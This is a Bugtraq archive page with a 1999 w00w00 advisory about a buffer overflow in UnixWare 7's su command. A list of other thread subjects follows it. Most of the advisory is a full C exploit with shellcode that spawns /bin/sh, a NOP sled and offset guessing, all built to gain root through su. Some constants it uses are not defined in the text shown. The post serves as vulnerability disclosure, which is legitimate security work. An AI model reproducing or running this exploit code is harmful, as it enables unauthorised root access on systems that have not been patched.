Bugtraq mailing list archives
[w00giving '99 #5 and w00news]: UnixWare 7's su
From: shok () CANNABIS DATAFORCE NET (Matt Conover)
Date: Fri, 26 Nov 1999 04:16:41 +0300
w00w00 Security Development (WSD) http://www.w00w00.org/advisories.html ---------------------------------------------------------------------------- Sorry, we've been really tied up these past 2-3 weeks and have been unable to write up the advisories. We'll send three SCO advisories tonight to make up for it. We should have some interesting ones within the next two weeks (it's really hard to find the time to write up the exploits and advisories). You'll noticed we jumped from #3 to #5. w00giving advisory #4 has been available on http://www.w00w00.org/advisories.html for 2-3 weeks, but it wasn't posted to this list. w00w00.org has had hits from 55 different countries as of yesterday. If you are going to send out advisories, please cc them to news () technotronic com, also. You can subscribe to it by sending "subscribe news" to "subscribe news" to majordomo () technotronic com. Technotronic is a good site and beginning now, you will always see our advisories/articles/code posted on there first (order of release: w00w00.org, news () technotronic com, news groups, bugtraq). ---------------------------------------------------------------------------- Discovered by: K2 (ktwo () ktwo ca) The su command on SCO's UnixWare 7 has improper bounds checking on the username passed (via argv[1]), which can cause a buffer overflow when a lengthy username is passed. ---------------------------------------------------------------------------- Exploit (by K2): // UnixWare7 /usr/bin/su local, K2, revisited Oct-30-1999 #include <unistd.h> #include <stdio.h> #include <stdlib.h> #include <string.h> char shell[] = "\xeb\x48\x9a\xff\xff\xff\xff\x07\xff\xc3\x5e\x31\xc0\x89\x46\xb4" "\x88\x46\xb9\x88\x46\x07\x89\x46\x0c\x31\xc0\x50\xb0\x8d\xe8\xdf" "\xff\xff\xff\x83\xc4\x04\x31\xc0\x50\xb0\x17\xe8\xd2\xff\xff\xff" "\x83\xc4\x04\x31\xc0\x50\x8d\x5e\x08\x53\x8d\x1e\x89\x5e\x08\x53" "\xb0\x3b\xe8\xbb\xff\xff\xff\x83\xc4\x0c\xe8\xbb\xff\xff\xff\x2f" "\x62\x69\x6e\x2f\x73\x68\xff\xff\xff\xff\xff\xff\xff\xff\xff"; const char x86_nop=0x90; long nop,esp; long offset=DEFOFF; char buffer[SIZE]; long get_esp() { __asm__("movl %esp,%eax"); } int main (int argc, char *argv[]) { register int i; if (argc > 1) offset += strtol(argv[1], NULL, 0); if (argc > 2) nop += strtoul(argv[2], NULL, 0); else nop = NOPDEF; esp = get_esp(); memset(buffer, x86_nop, SIZE); memcpy(buffer+nop, shell, strlen(shell)); for (i = nop+strlen(shell); i < SIZE-4; i += 4) *((int *) &buffer[i]) = esp+offset; printf("offset = [0x%x]\n",esp+offset); execl("/usr/bin/su", "su", buffer, NULL); printf("exec failed!\n"); return 0; } ---------------------------------------------------------------------------- Patch: SCO is in the process of fixing a list of vulnerabilities we sent a few weeks ago. ----------------------------------------------------------------------------
Current thread:
- Re: local users can panic linux kernel (was: SuSE syslogd advisory), (continued)
- Re: local users can panic linux kernel (was: SuSE syslogd advisory) Alan Cox (Nov 19)
- Re: local users can panic linux kernel (was: SuSE syslogd advisory) Savochkin Andrey Vladimirovich (Nov 20)
- ANN: Bruce v1.0 Early Access 1 - Available for downloa Alec Muffett (Nov 22)
- Re: local users can panic linux kernel (was: SuSE syslogd Alan Cox (Nov 22)
- Re: local users can panic linux kernel (was: SuSE syslogd Savochkin Andrey Vladimirovich (Nov 23)
- Re: local users can panic linux kernel (was: SuSE syslogd Darren Reed (Nov 23)
- Re: local users can panic linux kernel (was: SuSE syslogd Savochkin Andrey Vladimirovich (Nov 24)
- Remote DoS Attack in WorldClient Server v2.0.0.0 Vulnerability Ussr Labs (Nov 24)
- Remote DoS Attack in BisonWare FTP Server V3.5 Vulnerability Ussr Labs (Nov 24)
- Re: local users can panic linux kernel (was: SuSE syslogd Darren Reed (Nov 24)
- [w00giving '99 #5 and w00news]: UnixWare 7's su Matt Conover (Nov 25)
- Buffer Overflow Survey Paper Crispin Cowan (Nov 22)
- Operational Issues: Applications & Appliances (was: Buffer Overflow Survey Paper) Crispin Cowan (Nov 23)
- [ COBALT ] Security Advisory - Sendmail Jeff Bilicki (Nov 24)
- Re: Operational Issues: Applications & Appliances (was: Buffer Overflow Survey Paper) Scott Zimmerman (Nov 24)
- Re: Operational Issues: Applications & Appliances (was: Buffer Overflow Survey Paper) Simple Nomad (Nov 24)
- Netscape communicator 4.x Javascript security flaw Ahmed Ghandour (Nov 24)
- Re: Netscape communicator 4.x Javascript security flaw Metal Hurlant (Nov 26)
- Re: Netscape communicator 4.x Javascript security flaw Ahmed Ghandour (Nov 26)
- Windows NT 4.0 Service Pack 6A Breaks IP Forwarding Brendan Howes (Nov 25)
- Oracle Web Listener Mnemonix (Nov 25)